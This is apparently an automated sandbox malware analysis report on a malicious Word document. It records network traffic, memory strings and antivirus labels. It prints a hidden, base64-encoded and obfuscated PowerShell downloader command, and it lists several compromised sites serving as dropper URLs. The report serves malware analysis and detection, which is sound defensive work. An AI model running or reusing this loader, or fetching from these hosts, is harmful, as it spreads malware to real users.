Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://hotelshivansh.com/UserFiles/8/Avira URL Cloud: Label: malware
Source: https://www.isatechnology.com/training/b/Avira URL Cloud: Label: malware
Source: http://transfersuvan.com/wp-admin/OVl/Avira URL Cloud: Label: malware
Source: https://physio-svdh.ch/wp-admin/kK/PAvira URL Cloud: Label: malware
Source: https://b2bcom.com.br/site/0H/Avira URL Cloud: Label: phishing
Source: https://physio-svdh.ch/wp-admin/kK/Avira URL Cloud: Label: malware
Source: http://arquivopop.com.br/index_htm_files/Kxh/Avira URL Cloud: Label: malware
Source: https://cairocad.com/cgi-bin/1PBB/Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: v22Pc0qA.doc.docMetadefender: Detection: 44%Perma Link
Source: v22Pc0qA.doc.docReversingLabs: Detection: 86%

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connectionShow sources
Source: unknownHTTPS traffic detected: 177.12.163.108:443 -> 192.168.2.22:49173 version: TLS 1.0
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2113923637.00000000028B0000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global trafficDNS query: name: physio-svdh.ch
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.209.195.106:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.209.195.106:443

Networking:

barindex
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in memory: <img width="120" height="120" src="https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png" class="home__services--icon wp-post-image" alt="" srcset="https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-120x120.png 120w, https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital.png 437w, https://b2bcom.com.br/wp-content/uploads/2019/02/mktdigital-100x100.png 100w" sizes="(max-width: 120px) 100vw, 120px" /></a>
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: global trafficHTTP traffic detected: GET /files/b/ HTTP/1.1Host: ownitconsignment.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /UserFiles/8/ HTTP/1.1Host: hotelshivansh.comConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox ViewASN Name: IPV6InternetLtdaBR IPV6InternetLtdaBR
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknownHTTPS traffic detected: 177.12.163.108:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{438FF120-FFD8-4816-B513-C2DC6937B540}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /files/b/ HTTP/1.1Host: ownitconsignment.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /UserFiles/8/ HTTP/1.1Host: hotelshivansh.comConnection: Keep-Alive
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: <a class="social__anchor external" href="https://www.facebook.com/b2bcomcomunicacao" title="Facebook"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: <a class="social__anchor external" href="https://www.youtube.com/channel/UCrYEOm4ym22murrhb0WGC2A" title="Youtube"> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: physio-svdh.ch
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Feb 2021 22:18:25 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.4.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmpString found in binary or memory: http://arquivopop.com.br
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.2110705774.0000000000234000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000004.00000003.2106686641.000000001D0B8000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2118830789.000000001B608000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.2118741244.000000001B584000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: http://hotelshivansh.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpString found in binary or memory: http://ownitconsignment.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.2120136620.000000001D2B0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpString found in binary or memory: http://transfersuvan.com
Source: powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmpString found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000003.2110391188.000000001B636000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleane
Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/#about
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/#blog
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/#clients
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/#contact
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/#home
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/#portfolio
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/#services
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/blog
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/blog/empreender-e-sonhar/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/blog/novo-normal-o-papel-do-e-commerce-para-as-novas-empresas/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/blog/sinalizacao-seu-cartao-de-visita/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/acm-2/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/acm-3/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/acm/
Source: powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/portfolio/aco-corten-2/
